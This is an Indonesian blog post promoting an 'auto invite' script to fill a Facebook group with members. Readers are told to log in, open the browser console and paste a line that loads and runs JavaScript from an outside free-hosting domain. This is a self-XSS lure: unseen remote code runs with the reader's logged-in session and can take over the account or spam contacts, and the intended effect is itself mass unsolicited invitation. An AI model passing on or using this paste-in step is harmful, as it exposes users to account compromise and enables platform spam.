Auto Invite Teman Ke Grup


Script Auto Invite Group Facebook . yak,,,, bagi para facebookers yang pengen punya group dengan anggota yang beribu-ribu???? hahahahaha
Nih pakek cara ini pasti langsung deh tu group langsung banyak anggotanya..
ok langsung aja ya
1. buka browser mozilla
2. lalu login FB sobat
3. masuk ke group yang udah sobat buat 
4. lalu tekan  CTRL + SHIFT + K Pada keyboard sobat
5. lalu Copy & Paste code Ini :
 document.body.appendChild(document.createElement('script')).src='http://cyberboomb-like.16mb.com/AutoInviteGroup.js';
6. Lalu Tekan Enter ....
7. tunggu sampai prosesnya selesei....

Gimana???? bisa gak????? klo gak bisa komentar yaaahh....

Related Post:


Facebook Comments
0 Blogger Comments


Posting Komentar - Back to Content


Followers

Pageviews

Banner Teman

Sat-cyber Izzan-Hacker Dark48 CyBer-4Line